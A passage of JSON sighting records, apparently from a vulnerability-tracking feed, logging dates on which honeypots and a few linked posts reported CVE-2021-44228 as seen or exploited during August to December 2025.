"50a5e27d-c65b-4256-8d07-27d391396a05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "f14f0497-a64e-4a2d-a4d0-a1f38985a969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-04)", "content": "", "creation_timestamp": "2025-08-04T00:00:00.000000Z"}, {"uuid": "5f342683-24e5-4ab5-8dda-7f9f63a69a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-09)", "content": "", "creation_timestamp": "2025-09-09T00:00:00.000000Z"}, {"uuid": "dd57fc11-e1d5-4e6b-aa0d-5130744ac450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "3562937c-ccf8-43e4-9a16-95c1ad74fe2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-05)", "content": "", "creation_timestamp": "2025-08-05T00:00:00.000000Z"}, {"uuid": "9a76b5ca-36dd-422e-a921-f4c018fe4694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-31)", "content": "", "creation_timestamp": "2025-10-31T00:00:00.000000Z"}, {"uuid": "533a6190-5da6-45ce-9854-207c7a045f89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-19)", "content": "", "creation_timestamp": "2025-10-19T00:00:00.000000Z"}, {"uuid": "cc5966bc-436a-4ab6-9fd5-84ccabb3bd33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-07)", "content": "", "creation_timestamp": "2025-08-07T00:00:00.000000Z"}, {"uuid": "3562aaef-e225-420e-8b6e-c606e7272718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "d202ed21-e4ce-4646-8c91-889bb5aebf46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-03)", "content": "", "creation_timestamp": "2025-11-03T00:00:00.000000Z"}, {"uuid": "2b465f53-b997-41ce-9fb1-11a6f4ccebf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-06)", "content": "", "creation_timestamp": "2025-08-06T00:00:00.000000Z"}, {"uuid": "b1766a55-162c-413a-969f-1f5e5ceeed12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "33013a6a-f9ed-46e0-9cd2-412efc19f915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-08)", "content": "", "creation_timestamp": "2025-08-08T00:00:00.000000Z"}, {"uuid": "a8c6c16c-5fdb-46a0-9ba2-67353727ebba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-13)", "content": "", "creation_timestamp": "2025-09-13T00:00:00.000000Z"}, {"uuid": "5bc70c41-5712-46de-83d1-290311c3bb9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Aggerio/9330fd5699568e142d5ba1c5f775d5ce", "content": "", "creation_timestamp": "2025-11-16T15:29:50.000000Z"}, {"uuid": "cd57c16b-8e43-4f1f-86f0-68d2a2279aab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-28)", "content": "", "creation_timestamp": "2025-11-28T00:00:00.000000Z"}, {"uuid": "542cd6de-5173-48d7-b6af-d594af3757fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-06)", "content": "", "creation_timestamp": "2025-09-06T00:00:00.000000Z"}, {"uuid": "3433b381-60c4-436c-bd52-0b4134b7e79d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-01)", "content": "", "creation_timestamp": "2025-12-01T00:00:00.000000Z"}, {"uuid": "76e025b7-9a5e-4352-a9e1-206eb818bec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-09)", "content": "", "creation_timestamp": "2025-08-09T00:00:00.000000Z"}, {"uuid": "cf1210bd-115c-490e-a4f0-fecdf40bf631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-08)", "content": "", "creation_timestamp": "2025-10-08T00:00:00.000000Z"}, {"uuid": "6e9fe392-e8b6-4128-813d-d86fa9573609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-21)", "content": "", "creation_timestamp": "2025-09-21T00:00:00.000000Z"}, {"uuid": "f88c5122-d614-419f-b903-df4c6b55f6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Hamid-K/f4288dae3a1f2dea8905b1cf16d59c1b", "content": "", "creation_timestamp": "2025-10-03T16:37:38.000000Z"}, {"uuid": "c0315ed4-3571-4d85-a56b-dca04fe29e28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-01)", "content": "", "creation_timestamp": "2025-11-01T00:00:00.000000Z"}, {"uuid": "716165ad-9690-4e08-a447-f7ddd467e21d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-10)", "content": "", "creation_timestamp": "2025-08-10T00:00:00.000000Z"}, {"uuid": "f1b83a24-5a29-4b2e-bd29-7275ea53f744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-10)", "content": "", "creation_timestamp": "2025-08-10T00:00:00.000000Z"}, {"uuid": "a65d074b-fb6c-4181-97b5-c2637eb4a022", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-23)", "content": "", "creation_timestamp": "2025-10-23T00:00:00.000000Z"}, {"uuid": "21368243-d166-494f-9192-5d5292e550ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-06)", "content": "", "creation_timestamp": "2025-11-06T00:00:00.000000Z"}, {"uuid": "09ea340f-b0cf-409e-be38-58daacc8415a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-12)", "content": "", "creation_timestamp": "2025-08-12T00:00:00.000000Z"}, {"uuid": "17f58729-9195-48c3-9b36-320a39382bed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-28)", "content": "", "creation_timestamp": "2025-09-28T00:00:00.000000Z"}, {"uuid": "871be147-e5c3-46cf-8489-58a529ad1909", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-11)", "content": "", "creation_timestamp": "2025-08-11T00:00:00.000000Z"}, {"uuid": "fbf6e6d1-1c3b-40bb-9099-f6a02065d497", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-08)", "content": "", "creation_timestamp": "2025-11-08T00:00:00.000000Z"}, {"uuid": "baf3922a-284c-48ed-95c5-53a3bd79a3bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-01)", "content": "", "creation_timestamp": "2025-11-01T00:00:00.000000Z"}, {"uuid": "27985b9a-0e4c-4415-8f88-76d246a31cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-14)", "content": "", "creation_timestamp": "2025-09-14T00:00:00.000000Z"}, {"uuid": "c94e37cd-fe1f-4fb1-86c5-eed21dd57c54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-11)", "content": "", "creation_timestamp": "2025-11-11T00:00:00.000000Z"}, {"uuid": "86dc5700-057a-4a66-a940-f24ffab18570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m3ntgfvctc2c", "content": "", "creation_timestamp": "2025-10-20T22:10:10.514063Z"}, {"uuid": "1b17c39a-6731-44fc-bd80-174f148efab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-13)", "content": "", "creation_timestamp": "2025-08-13T00:00:00.000000Z"}, {"uuid": "e7f0e24d-e475-43e8-b19b-6c5bed4e53a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "746d996e-baf1-42b2-86b0-ded52c9ae15d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-12)", "content": "", "creation_timestamp": "2025-11-12T00:00:00.000000Z"}, {"uuid": "738f748a-77dc-43cd-a61c-52f00cd9d173", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-07)", "content": "", "creation_timestamp": "2025-09-07T00:00:00.000000Z"}, {"uuid": "37c6ecbc-1434-47ef-ab2c-dd639c1c3d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-442280", "type": "seen", "source": "https://gist.github.com/c0axial/f499717d0046678e19e2f0d43b9d4b55", "content": "", "creation_timestamp": "2025-08-14T14:03:30.000000Z"}, {"uuid": "59ef60fe-6266-4eb3-a90d-5b282ed1a540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/c0axial/f499717d0046678e19e2f0d43b9d4b55", "content": "", "creation_timestamp": "2025-08-14T14:03:30.000000Z"}, {"uuid": "2f2744d7-8647-4a3f-9ba9-9f92b57d8a0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "3150b3a8-ca56-47ea-9dc1-a3d522c8d69b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "692ff0e2-ac07-4e24-aff2-e3dff313a97d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-16)", "content": "", "creation_timestamp": "2025-11-16T00:00:00.000000Z"}, {"uuid": "4541904b-0330-4db7-a6cb-8596ea2f1900", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-17)", "content": "", "creation_timestamp": "2025-09-17T00:00:00.000000Z"}, {"uuid": "dc3f9b9b-1904-4dcd-af71-aec708f52e32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "a3823edb-430e-4422-b62b-44b0122e6a46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "0afebc76-d84d-4fce-a759-ec54f663d318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "f8bf12e7-572b-4b8d-a391-a6009bad7b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-15)", "content": "", "creation_timestamp": "2025-08-15T00:00:00.000000Z"}, {"uuid": "c181bdcb-2350-458d-974f-1e865a350928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-13)", "content": "", "creation_timestamp": "2025-11-13T00:00:00.000000Z"}, {"uuid": "3dda568a-5161-41ff-baf9-8289b0877f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-16)", "content": "", "creation_timestamp": "2025-08-16T00:00:00.000000Z"}, {"uuid": "3c676917-b4d4-471f-aacf-8f1779fc5cf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-26)", "content": "", "creation_timestamp": "2025-10-26T00:00:00.000000Z"}, {"uuid": "da8c8dc9-6999-4f2a-b92c-a9720b0f9f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-10)", "content": "", "creation_timestamp": "2025-11-10T00:00:00.000000Z"}, {"uuid": "3813aa09-eeb5-4730-ab28-3bc48ad5fbc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-16)", "content": "", "creation_timestamp": "2025-08-16T00:00:00.000000Z"}, {"uuid": "fb00039e-1c5e-45da-abbe-5a392a950118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-09)", "content": "", "creation_timestamp": "2025-10-09T00:00:00.000000Z"}, {"uuid": "8da28a5c-d6ca-49f7-9b80-c6e1463d2a49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-10)", "content": "", "creation_timestamp": "2025-09-10T00:00:00.000000Z"}, {"uuid": "2b05649a-ebe1-4b46-9606-9dcd539797e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-20)", "content": "", "creation_timestamp": "2025-10-20T00:00:00.000000Z"}, {"uuid": "adfdd899-55bc-4aba-a870-65022934b71a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-17)", "content": "", "creation_timestamp": "2025-08-17T00:00:00.000000Z"}, {"uuid": "5f6f15cd-4439-4d8b-bcd0-92e6a5bdf0b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-19)", "content": "", "creation_timestamp": "2025-11-19T00:00:00.000000Z"}, {"uuid": "0db81adc-9ae0-426e-9eba-f852dc83690b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-18)", "content": "", "creation_timestamp": "2025-08-18T00:00:00.000000Z"}, {"uuid": "209a8445-282f-4b9a-9149-c296ba2bd0dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-19)", "content": "", "creation_timestamp": "2025-08-19T00:00:00.000000Z"}, {"uuid": "45ba7fb6-e9c0-4e62-b6b1-6cb68300c79a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-16)", "content": "", "creation_timestamp": "2025-10-16T00:00:00.000000Z"}, {"uuid": "3a038310-89af-4b40-aab5-ab36848eb3fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-11)", "content": "", "creation_timestamp": "2025-10-11T00:00:00.000000Z"}, {"uuid": "f8842143-15a0-432d-b6ad-575f06939460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-20)", "content": "", "creation_timestamp": "2025-08-20T00:00:00.000000Z"}, {"uuid": "dd838bf3-fc85-4a4f-ad93-aa4c6b9b94df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-28)", "content": "", "creation_timestamp": "2025-10-28T00:00:00.000000Z"}, {"uuid": "1267dab8-f8f9-45a2-8526-02a8850b0259", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-20)", "content": "", "creation_timestamp": "2025-08-20T00:00:00.000000Z"}, {"uuid": "e12d5e0a-3147-42ba-8e82-4bd41823d2f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-14)", "content": "", "creation_timestamp": "2025-10-14T00:00:00.000000Z"}, {"uuid": "92c84e93-7afa-4339-a48b-b28428b072a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-22)", "content": "", "creation_timestamp": "2025-10-22T00:00:00.000000Z"}, {"uuid": "8f9e0723-e63d-4895-b0f0-85402e524f0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-22)", "content": "", "creation_timestamp": "2025-09-22T00:00:00.000000Z"}, {"uuid": "240035d9-ea9e-4fe8-99cc-6f757d8394ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-05)", "content": "", "creation_timestamp": "2025-11-05T00:00:00.000000Z"}, {"uuid": "94d667f3-0f00-41f2-897b-29209f9e1145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "e7d04c71-771b-4bb9-8938-62f5ce524786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-04)", "content": "", "creation_timestamp": "2025-10-04T00:00:00.000000Z"}, {"uuid": "777843e4-ff0a-434b-a788-edb4a3103b69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-30)", "content": "", "creation_timestamp": "2025-10-30T00:00:00.000000Z"}, {"uuid": "75045e1d-82fe-48fd-83f8-b12c34bd5c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", 